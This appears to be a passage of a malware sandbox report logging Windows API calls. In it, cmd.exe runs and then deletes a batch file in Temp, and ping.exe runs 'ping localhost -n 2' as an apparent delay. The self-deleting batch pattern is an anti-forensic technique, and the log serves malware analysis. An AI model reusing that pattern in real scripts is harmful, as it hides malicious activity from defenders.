[0165.021] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.021] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.022] SetConsoleInputExeNameW () returned 0x1 [0165.022] GetConsoleOutputCP () returned 0x1b5 [0165.022] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.022] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.022] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.022] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.022] SetFilePointer (in: hFile=0x78, lDistanceToMove=150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.023] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.023] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.023] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0x30, lpOverlapped=0x0) returned 1 [0165.023] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=48, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\ntal.exe goto try\r\n") returned 48 [0165.024] _tell (_FileHandle=3) returned 198 [0165.024] _close (_FileHandle=3) returned 0 [0165.024] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.024] _get_osfhandle (_FileHandle=1) returned 0x7 
[0165.024] GetFileType (hFile=0x7) returned 0x2 [0165.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.025] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.025] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.025] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.025] GetFileType (hFile=0x7) returned 0x2 [0165.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.026] GetFileType (hFile=0x7) returned 0x2 [0165.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x792348*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x792348*, 
lpNumberOfCharsWritten=0x3ff0d0*=0x3) returned 1 [0165.027] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat ") returned 44 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] GetFileType (hFile=0x7) returned 0x2 [0165.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x2c) returned 1 [0165.028] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.028] GetFileType (hFile=0x7) returned 0x2 [0165.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.028] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0165.029] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0165.029] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0165.029] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0165.029] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x3fdce8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0165.029] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0165.029] _wcsicmp (_String1="1.bat", _String2=".") returned 3 [0165.029] _wcsicmp (_String1="1.bat", _String2="..") returned 3 [0165.029] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat")) returned 0x2020 [0165.030] DeleteFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat")) returned 1 [0165.031] FindNextFileW (in: hFindFile=0x798f08, lpFindFileData=0x798704 | out: lpFindFileData=0x798704) returned 0 [0165.031] GetLastError () returned 0x12 [0165.031] FindClose (in: hFindFile=0x798f08 | out: hFindFile=0x798f08) returned 1 [0165.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.032] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.032] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.032] SetConsoleInputExeNameW () returned 0x1 [0165.032] GetConsoleOutputCP () returned 0x1b5 [0165.032] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.032] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.032] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0165.033] GetLastError () returned 0x2 [0165.033] _get_osfhandle (_FileHandle=2) returned 0xb [0165.033] GetFileType (hFile=0xb) returned 0x2 [0165.033] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0165.033] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x3ff05c | out: lpMode=0x3ff05c) returned 1 [0165.033] _get_osfhandle (_FileHandle=2) returned 0xb [0165.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x3ff090 | out: lpConsoleScreenBufferInfo=0x3ff090) returned 1 [0165.033] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4ac44640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0165.034] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b4*=0x21) returned 1 [0165.034] CmdBatNotification () returned 0x1 [0165.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.034] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.035] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.035] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.035] SetConsoleInputExeNameW () returned 0x1 [0165.035] GetConsoleOutputCP () returned 0x1b5 [0165.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.035] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.035] exit (_Code=1) Process: id = "9" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x19964000" os_pid = "0x72c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" 
parent_id = "8" os_parent_pid = "0xcc" cmd_line = "ping localhost -n 2 " cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1179 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1180 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1181 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1182 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1183 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1184 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1185 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1186 start_va = 0xcf0000 end_va = 0xcf7fff entry_point = 0xcf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 1187 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1188 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1189 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1190 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1191 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1192 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1193 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1194 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1195 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1196 start_va = 0xa0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1197 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1198 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: 
"c:\\windows\\system32\\wow64win.dll") Region: id = 1199 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1200 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1201 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1202 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1203 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1204 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1205 start_va = 0x75730000 end_va = 0x75736fff entry_point = 0x75730000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1206 start_va = 0x75740000 end_va = 0x7575bfff entry_point = 0x75740000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1207 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1208 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: 
"c:\\windows\\syswow64\\sspicli.dll") Region: id = 1209 start_va = 0x75a00000 end_va = 0x75a05fff entry_point = 0x75a00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1210 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1211 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1212 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1213 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1214 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1215 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1216 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1217 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1218 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1219 start_va = 0x778f0000 end_va = 0x77924fff entry_point = 0x778f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1220 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1221 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1222 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1223 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1224 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1225 start_va = 0x3d0000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1226 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1227 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1261 start_va = 
0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1262 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1263 start_va = 0x80000 end_va = 0x82fff entry_point = 0x80000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 1264 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1265 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1266 start_va = 0x560000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1267 start_va = 0xd00000 end_va = 0x20fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 1268 start_va = 0x6f0000 end_va = 0x9befff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1269 start_va = 0x75690000 end_va = 0x756cbfff entry_point = 0x75690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1270 start_va = 0x360000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1271 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 
1286 start_va = 0x75680000 end_va = 0x75685fff entry_point = 0x75680000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1291 start_va = 0x751f0000 end_va = 0x75233fff entry_point = 0x751f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1297 start_va = 0x9c0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1299 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1300 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1301 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1303 start_va = 0x750b0000 end_va = 0x750b5fff entry_point = 0x750b0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1364 start_va = 0x75060000 end_va = 0x75097fff entry_point = 0x75060000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1701 start_va = 0xaf0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1925 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1926 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1927 start_va = 0xc70000 end_va = 0xcaffff entry_point = 
0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 1928 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1955 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1956 start_va = 0x2160000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1957 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 62 os_tid = 0x3ac [0161.114] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb1c | out: lpSystemTimeAsFileTime=0x1efb1c*(dwLowDateTime=0x62347eb0, dwHighDateTime=0x1d4406f)) [0161.114] GetCurrentProcessId () returned 0x72c [0161.114] GetCurrentThreadId () returned 0x3ac [0161.114] GetTickCount () returned 0x308e5 [0161.114] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb14 | out: lpPerformanceCount=0x1efb14*=27932922601) returned 1 [0161.124] GetModuleHandleA (lpModuleName=0x0) returned 0xcf0000 [0161.124] __set_app_type (_Type=0x1) [0161.125] __p__fmode () returned 0x75c631f4 [0161.125] __p__commode () returned 0x75c631fc [0161.127] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xcf2ae1) returned 0x0 [0161.129] __getmainargs (in: _Argc=0xcf50d4, _Argv=0xcf50dc, _Env=0xcf50d8, _DoWildCard=0, _StartInfo=0xcf50e8 | out: _Argc=0xcf50d4, _Argv=0xcf50dc, _Env=0xcf50d8) returned 0 [0161.129] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.129] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.129] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xcf5440 | out: lpWSAData=0xcf5440) returned 0 [0161.140] RegOpenKeyExA (in: hKey=0x80000002, 
lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef5ac | out: phkResult=0x1ef5ac*=0x7c) returned 0x0 [0161.140] RegQueryValueExA (in: hKey=0x7c, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x1ef5a0, lpData=0x1ef5a8, lpcbData=0x1ef5a4*=0x4 | out: lpType=0x1ef5a0*=0x0, lpData=0x1ef5a8*=0x0, lpcbData=0x1ef5a4*=0x4) returned 0x2 [0161.140] RegCloseKey (hKey=0x7c) returned 0x0 [0161.141] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x1ef574*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1ef59c | out: ppResult=0x1ef59c*=0x0) returned 11001 [0161.141] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x1ef574*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1ef59c | out: ppResult=0x1ef59c*=0x27b5f8*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="AUFDDCntXwT", ai_addr=0x27b6c0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x27b6e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x279150*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0163.485] FreeAddrInfoW (pAddrInfo=0x27b5f8*(ai_flags=0, 